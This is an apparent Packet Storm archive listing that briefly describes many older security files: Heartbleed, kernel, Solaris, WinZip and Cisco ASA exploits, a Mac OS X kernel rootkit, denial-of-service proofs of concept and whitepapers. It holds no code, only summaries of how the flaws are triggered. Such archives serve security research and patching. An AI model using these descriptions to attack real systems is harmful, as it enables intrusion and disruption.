SedSystems D3 Decimator suffers from default credential and local file disclosure vulnerabilities.
30e71a2e924700d68946538cff7d0f87bb02615b8297043b63f0dbb2275f4336This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leaked information is returned encrypted and is then decrypted, decompressed and wrote to a file to annoy IDS/forensics. The exploit can set the heatbeart payload length arbitrarily or use two preset values for 0x00 and MAX length. The vulnerability occurs due to bounds checking not being performed on a heap value which is user supplied and returned to the user as part of DTLS/TLS heartbeat SSL extension. All versions of OpenSSL 1.0.1 to 1.0.1f are known affected. You must run this against a target which is linked to a vulnerable OpenSSL library using DTLS/TLS.
68bcedd2a727967e92d3a342ff6f366dc236929be5c2a5f69dba9ed2c35f299aThis is a whitepaper discussing arbitrary java code execution leveraging the Java Debugging Wire Protocol (JDWP).
0adc9316e503d0fe3daa7da5e64d578c4f345eb5aeee58462a82afd7494b1a6dThe MobileIron VSP appliance provides a restricted "clish" java application that can be used for performing a minimal amount of configuration and requires an "enable" password for elevated privileges. Probing under the hood of this shell indicates that certain commands are run in the native linux OS with sudo, by using the "show processes" command you can see the commands being used. Due to a lack of input sanitization, it is possible to run arbitrary commands as root.
b4ff0c23630c23454621f19b315444b641a2dc3df5ce86782a719ea37d53d3e6This is the Cisco ASA ethernet information leak exploit that leverages the vulnerability noted in CVE-2003-0001. Versions prior to 8.4.4.6 and 8.2.5.32 are affected.
ada92ec408b17ad98b8a34bbb874aa0239b2511cafe8e2286f516be9b06a52b8This is a 64bit Mac OS-X kernel rootkit that uses no hardcoded address to hook the BSD subsystem in all OS-X Lion and below. It uses a combination of syscall hooking and DKOM to hide activity on a host. String resolution of symbols no longer works on Mountain Lion as symtab is destroyed during load, this code is portable on all Lion and below but requires re-working for hooking under Mountain Lion.
b104cfd2f826400eb9d8d5a81941ae270ed54b62ebfb9893fc474185b717dd60MS11-083 denial of service proof of concept exploit. It attempts to trigger the ICMP refCount overflow in TCP/IP stack of Win7/Vista/Win2k8 hosts. This requires sending 2^32 UDP packets to a host on a closed port, or 4,294,967,296 packets. A dereference function must be called that is not triggered via UDP but ICMP echo packets. This exploit creates 250 threads and floods a host with UDP packets and then attempts to trigger the de-ref using ping.
8599b0b1ac07fed75a167b44758ada7368eb687ba515c6c1f6c4ea9d3e84cbf4These are slides from a talk called Hacking Embedded Devices for Fun and Profit. It uses Sky Broadband as a case study.
c47817875f30772c127c3169814a0db083ad87a06d51af5acdb3128b68dce9c6Information leak exploit for Linux kernel versions 2.6.37-rc1 and below which leaks kernel stack space back to userland due to uninitialized struct member "reserved" in struct serial_icounter_struct copied to userland. Uses ioctl to trigger memory leak, dumps to file and displays to command line.
fc5c06243bfa87c53d6e5f3c22e2104a377b95a4b22238e7d035f9b2e20066f4Linux kernel versions 2.6.37 and below local kernel denial of service exploit that leverages a divide-by-zero error in tcp_select_initial_window when processing user supplied TCP_MAXSEG.
f20e0d2ebc4ff05467a9771775dda2115edfe394b7365dba0410ad1d236a4eabOracle Sun Solaris 10 su NULL point proof of concept exploit.
eba90a94a7182395d586cd8f497035232e075f309dfba27247a0e3361c6309b0Apple Mac OS X versions 10.6.3 and below suffer from a chpass BSD insecure temp file creation in /etc vulnerability. A user can create a file with rw perms in /etc as owner and populate it with arbitrary data. This could be utilized to fill the disk or write configuration file information that could be combined with another flaw to elevate local privileges.
7612d1322811886943d0e1ba838ed0c5d2209c568bc240a49eeb336f0af2080cMac OS X versions 10.5.6 and 10.5.7 ptrace() mutex handling denial of service exploit. This code should be run in a loop and due to problems with mutex handling in ptrace a denial of service can occur when a destroyed mutex is attempted to be interlocked by the OSX kernel giving rise to a race condition. You may need to run this code multiple times.
280d49ab7dc2a6f1d65feb29ee1a9c5ba38aedb401fb0e81e12ef3860ea1d82fSun VirtualBox versions 3.0.6 and below local root exploit that takes advantage of a popen() meta char shell injection vulnerability.
e2ddedb66eb6b5695c18761f7fb3938a54e20b5be176b2e29ef59c221c7f1e0fThis is a local root exploit for the Linux 2.6.29 ptrace_attach() race condition that allows a process to gain elevated privileges under certain conditions.
db9565192db3ee04f85227cfe9fa0b007cf4b055bb2747ed491261b3a6efd308Citadel SMTP versions 7.10 and below remote overflow exploit.
17d73e7c5984975be22f519415b7f5914aaaa74629f78f76ee5f4586a019b28dWindows RSH daemon versions 1.8 and below remote buffer overflow exploit.
1c530d10caf782cb1a6270dae0b0e5974153013a57ef1f83b6166717ed3a1918Lotus Domino IMAP4 server version 6.5.4 / Windows 2000 Advanced Server x86 remote buffer overflow exploit.
b914a5a129df141a9e81efa513ca01b96c180ff72cea7dafc716b3203367e1a3WinZip versions 10.0.7245 and below FileView ActiveX buffer overflow exploit.
13135b625739a870d46e0156520936ebef5b93a66dc0bdbacf68dd04b7de0584GNU/Linux mbse-bbs versions 0.70.0 and below local root exploit that makes use of a stack overflow.
b9b6c8e90f30995598ab9252882b6e7bfe68361174d80d1b09bb34e24378764cWinZIP versions 10.0.7245 and below FileView ActiveX control remote buffer overflow exploit.
a55c09bb96fdc249ab51759f91535b4960838cdf65004233a7630f189ec5dda1WinZIP versions 10.0.7245 and below FileView ActiveX control stack overflow proof of concept exploit.
45e7ef5aa4bed66d4ed69bb7ffcbf9d14a655fc54a25b33506fdc4372ff0f652Solaris in.telnetd 8.0 and prior remote exploit. A boundary condition error exists in telnet daemons derived from the BSD telnet daemon. Under certain circumstances, the buffer overflow can occur when a combination of telnet protocol options are received by the daemon. The function responsible for processing the options prepares a response within a fixed sized buffer, without performing any bounds checking. This exploit has been tested against Solaris 7 & Solaris 8 (sparc).
8b1b9e7b12ccde64848ee3e68e52d71b897094c36e01d0c6aefb642d65d2014bSGI IRIX 6.5 /usr/sysadm/bin/runpriv local root exploit.
87ee2433cea6d25492bbf29d76ac2dddfffb1036915de7f4e24d87a028286cbeSCO Openserver 5.0.7 termsh exploit. 'termsh' is a program to view or modify an existing terminal entry on SCO Openserver. A stack based overflow exists in the handling of command line arguments, namely the [-o oadir] argument. It is installed setgid auth in a default SCO Openserver 5.0.7 install. An attacker may use this flaw to gain write access to /etc/passwd or /etc/shadow allowing for local root compromise.
80848a38a842001ba4c5cb1a4aa2616cfde210738c9f9ac3f9e0ec9ee9fa8266
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed